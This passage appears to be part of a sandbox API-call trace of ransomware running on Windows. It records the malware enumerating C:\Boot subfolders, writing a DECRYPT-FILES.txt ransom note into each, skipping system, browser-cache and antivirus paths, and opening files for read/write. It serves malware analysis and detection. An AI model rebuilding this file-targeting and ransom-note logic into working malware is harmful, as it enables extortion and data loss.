hTemplateFile=0x0) returned 0x424 [0071.324] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.325] CloseHandle (hObject=0x424) returned 1 [0071.325] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0071.325] lstrcatW (in: lpString1="C:\\Boot\\pt-PT\\", lpString2="*" | out: lpString1="C:\\Boot\\pt-PT\\*") returned="C:\\Boot\\pt-PT\\*" [0071.325] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.325] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.325] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.325] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.325] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.325] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.326] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.326] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.326] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.326] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.326] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.326] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0071.326] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.326] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\pt-PT\\" | out: lpString1="C:\\Boot\\pt-PT\\") returned="C:\\Boot\\pt-PT\\" [0071.326] lstrcatW (in: lpString1="C:\\Boot\\pt-PT\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\pt-PT\\bootmgr.exe.mui") returned="C:\\Boot\\pt-PT\\bootmgr.exe.mui" [0071.326] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.326] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-pt\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.328] CloseHandle (hObject=0x0) returned 0 [0071.328] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.328] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.328] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.328] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.328] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.328] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.328] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.328] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.328] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.328] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.328] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.328] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.329] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.329] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.329] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.329] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.329] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.329] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.329] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.329] lstrlenW (lpString="C:\\Boot\\pt-PT\\") returned 14 [0071.329] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.329] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\pt-PT\\" | out: lpString1="C:\\Boot\\pt-PT\\") returned="C:\\Boot\\pt-PT\\" [0071.329] lstrcatW (in: lpString1="C:\\Boot\\pt-PT\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\pt-PT\\jkbimi8.tmp") returned="C:\\Boot\\pt-PT\\jkbimi8.tmp" [0071.329] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.329] CreateFileW (lpFileName="C:\\Boot\\pt-PT\\jkbimi8.tmp" (normalized: "c:\\boot\\pt-pt\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.329] CloseHandle (hObject=0x0) returned 0 [0071.329] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.329] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.330] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.330] CloseHandle (hObject=0x420) returned 1 [0071.330] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0071.330] lstrcmpW (lpString1="ru-RU", lpString2=".") returned 1 [0071.330] lstrcmpW (lpString1="ru-RU", lpString2="..") returned 1 [0071.330] lstrcatW (in: lpString1="ru-RU", lpString2="\\" | out: lpString1="ru-RU\\") returned="ru-RU\\" [0071.330] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="ru-RU\\" | out: lpString1="C:\\Boot\\ru-RU\\") returned="C:\\Boot\\ru-RU\\" [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Program Files") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch=":\\Windows") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Games\\") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\All Users") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="AhnLab") returned 0x0 [0071.330] StrStrW (lpFirst="C:\\Boot\\ru-RU\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.330] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0071.330] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.330] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\ru-RU\\\\jkbimi8.tmp") returned 26 [0071.330] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\\\jkbimi8.tmp" (normalized: "c:\\boot\\ru-ru\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.331] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0071.331] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.331] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\ru-RU\\\\DECRYPT-FILES.txt") returned 32 [0071.331] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\ru-ru\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.331] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.332] CloseHandle (hObject=0x424) returned 1 [0071.332] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0071.332] lstrcatW (in: lpString1="C:\\Boot\\ru-RU\\", lpString2="*" | out: lpString1="C:\\Boot\\ru-RU\\*") returned="C:\\Boot\\ru-RU\\*" [0071.332] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.333] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.333] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.333] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.333] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.333] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.333] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.333] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.333] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.333] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.333] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.333] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.333] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0071.333] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.333] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\ru-RU\\" | out: lpString1="C:\\Boot\\ru-RU\\") returned="C:\\Boot\\ru-RU\\" [0071.333] lstrcatW (in: lpString1="C:\\Boot\\ru-RU\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\ru-RU\\bootmgr.exe.mui") returned="C:\\Boot\\ru-RU\\bootmgr.exe.mui" [0071.333] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.333] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.334] CloseHandle (hObject=0x0) returned 0 [0071.334] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.334] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.334] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.334] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.334] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.334] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.334] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.334] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.334] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.334] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.334] lstrlenW (lpString="C:\\Boot\\ru-RU\\") returned 14 [0071.334] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.334] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\ru-RU\\" | out: lpString1="C:\\Boot\\ru-RU\\") returned="C:\\Boot\\ru-RU\\" [0071.334] lstrcatW (in: lpString1="C:\\Boot\\ru-RU\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\ru-RU\\jkbimi8.tmp") returned="C:\\Boot\\ru-RU\\jkbimi8.tmp" [0071.334] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.335] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\jkbimi8.tmp" (normalized: "c:\\boot\\ru-ru\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.335] CloseHandle (hObject=0x0) returned 0 [0071.335] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.336] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6bcfd00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6bcfd00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bcfd00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.336] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.336] CloseHandle (hObject=0x420) returned 1 [0071.336] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0071.336] lstrcmpW (lpString1="sv-SE", lpString2=".") returned 1 [0071.336] lstrcmpW (lpString1="sv-SE", lpString2="..") returned 1 [0071.336] lstrcatW (in: lpString1="sv-SE", lpString2="\\" | out: lpString1="sv-SE\\") returned="sv-SE\\" [0071.336] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="sv-SE\\" | out: lpString1="C:\\Boot\\sv-SE\\") returned="C:\\Boot\\sv-SE\\" [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Program Files") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch=":\\Windows") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Games\\") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\All Users") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.336] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.337] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.337] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="AhnLab") returned 0x0 [0071.337] StrStrW (lpFirst="C:\\Boot\\sv-SE\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.337] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0071.337] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.337] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\sv-SE\\\\jkbimi8.tmp") returned 26 [0071.337] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\\\jkbimi8.tmp" (normalized: "c:\\boot\\sv-se\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.337] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0071.337] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.337] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\sv-SE\\\\DECRYPT-FILES.txt") returned 32 [0071.337] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\sv-se\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.337] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.338] CloseHandle (hObject=0x424) returned 1 [0071.339] lstrlenW (lpString="C:\\Boot\\sv-SE\\") returned 14 [0071.339] lstrcatW (in: lpString1="C:\\Boot\\sv-SE\\", lpString2="*" | out: lpString1="C:\\Boot\\sv-SE\\*") returned="C:\\Boot\\sv-SE\\*" [0071.339] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6bf5e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6bf5e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.339] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.339] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: 